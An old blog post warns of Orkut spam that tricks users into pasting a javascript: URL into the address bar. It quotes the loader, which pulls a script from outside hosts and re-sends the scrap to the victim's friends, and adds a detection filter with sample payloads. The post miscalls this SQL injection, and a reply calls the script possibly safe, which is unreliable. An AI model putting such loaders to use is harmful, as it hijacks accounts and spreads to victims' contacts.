
I moved to Debiprasad.net. Now I am blogging there, so please visit Debiprasad.net and keep me reading. love, Debiprasad


SQL or Script Injections in Orkut

Nowadays I am getting spam scraps like the following.

Hey..One girl is about u.. also written about u in her ABOUT ME..And she added Your profile link and some of ur photos also...in her Profile..
Her profile link..

http://www.orkut.com/Profile.aspx?uid=16225293724851058484

I saw Your pics from her Profile..Super..Reply

When you click on the profile link, it opens that person's profile, and in the About Me section you find a message like the following.

To see soMe of my friend pics....many are there[Cant write here]

Clear ur address bar..copy paste.. Below Script To See This Person's Picture:-

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://picsfriends565.110mb.com/gudfoto.js';void(0)

I always ignore these and delete the scrap from my scrapbook, as I know it is nothing but an attempt at SQL or script injection or session hijacking. I have been interested in reading the JavaScript code and analysing what the script does, but for lack of time I kept putting it off. Today, however, I looked at one of the scripts. From this I understand that the script uses the popular Web 2.0 technology Ajax; let me explain what it does.

First it collects your friend list and sends that scrap to all of them, then it displays some text about SQL injection and ethical hacking, along with your friends' profile photos. My system is crashing frequently right now; I hope this will be fixed this week. After that I will play with all these scripts and post in detail. I promise I will also help you play with them.

And be careful: never run such scripts in your address bar. If you want to ask anything, post here and I will reply.
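As an added example (not code from the original post), here is a defender-side filter that flags scrap or profile text carrying the pattern described above: a javascript: URL that creates a script element and loads a remote .js file, together with the "copy this into your address bar" lure. The function and indicator names are my own, and the samples are constructed from the scrap quoted in the post.

```javascript
// Added example, not from the original post: scores a scrap/About Me text for the
// self-XSS "paste into your address bar" pattern. Names here are my own choices.

// Each indicator: an id for reporting, a regex, and a weight for the final score.
const INDICATORS = [
  { id: "javascript-url",   re: /javascript\s*:/i,                              weight: 3 },
  { id: "script-element",   re: /createElement\s*\(\s*['"]script['"]\s*\)/i,    weight: 3 },
  { id: "dom-append",       re: /\.(appendChild|insertBefore)\s*\(/i,           weight: 1 },
  { id: "remote-js-src",    re: /\.src\s*=\s*['"]https?:\/\/[^'"]+\.js['"]/i,   weight: 2 },
  { id: "address-bar-lure", re: /address\s*bar/i,                               weight: 1 },
  { id: "copy-paste-lure",  re: /copy\s*(and\s*|-)?paste/i,                     weight: 1 },
];

// Returns matched indicator ids, the weighted score, any external .js URLs the
// text would load, and a verdict: "block" (payload present), "review" (lure
// wording only), or "allow".
function classifyScrap(text) {
  const matched = INDICATORS.filter((ind) => ind.re.test(text));
  const score = matched.reduce((sum, ind) => sum + ind.weight, 0);
  const scriptUrls = [];
  const urlRe = /https?:\/\/[^\s'"<>]+\.js\b/gi;
  let m;
  while ((m = urlRe.exec(text)) !== null) scriptUrls.push(m[0]);
  return {
    indicators: matched.map((ind) => ind.id),
    score,
    scriptUrls,
    verdict: score >= 5 ? "block" : score >= 2 ? "review" : "allow",
  };
}

// Constructed sample modelled on the scrap quoted in the post (same hostname).
const SAMPLE_SCRAP = [
  "Clear ur address bar..copy paste.. Below Script To See This Person's Picture:-",
  "javascript:d=document;c=d.createElement('script');d.body.appendChild(c);",
  "c.src='http://picsfriends565.110mb.com/gudfoto.js';void(0)",
].join("\n");

// Constructed: lure wording with the payload stripped, and a harmless scrap.
const LURE_ONLY = "Clear ur address bar..copy paste the script below to see the pics";
const BENIGN_SCRAP = "Hey, nice photos from the trip! See you at college tomorrow.";

console.log(classifyScrap(SAMPLE_SCRAP)); // verdict "block", score 11
console.log(classifyScrap(LURE_ONLY).verdict, classifyScrap(BENIGN_SCRAP).verdict);
```

Run under Node; the lure-only sample lands in "review" and the benign one in "allow", so a moderation queue only sees messages that actually carry the loader.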


6 comments:

gargi said...

But is it safe or not?

Debiprasad Sahoo said...

Hi, Gargi. Thanks for your question/comment.

Well, after running this script in your browser address bar, you have to wait some time to see what happens. According to my knowledge and analysis, you will see a description of SQL injections with one related Orkut community on that page, along with your friends' photos. And for this particular code, I did not find any hijacking code. It may not be unsafe, but why would you need to do so?

Once again, I warn you not to run such scripts in your browser address bar. If you have another script, please let me know; I will find time to analyze it.

Debiprasad Sahoo said...

Update News:
The specific URL of that JavaScript is no longer available on the server. The sub domain picsfriends565 of 110mb.com is also deleted. I had not copied the script, so I lost it and cannot analyze and play with it. If any of you have this script, please email me.

Unknown said...

I have received the same message as typed by you. My friend has sent it to me, but I don't know the person in whose ABOUT ME my profile is added. What should I do?

Debiprasad Sahoo said...

Hi Geetika, Thanks for your question/comment.

Your friend has not sent you anything. He/she has just run the script in his/her browser, so you got that scrap automatically.

Your profile has not been added to that person's About Me. This is only a trick: if I click on the link, I will see my own profile. So there is no need to worry. Please see my latest post on this:
Saw link to your profile in Orkut in an unknown's profile?

You are welcome to ask me anything. You can email or post here in comments.

Debiprasad Sahoo said...

Recent Update:

Today I noticed that in that profile the URL of the script has changed. Now the path to the script is http://coolpics98.110mb.com/gudfoto.js

If you have any question please ask here or email me.
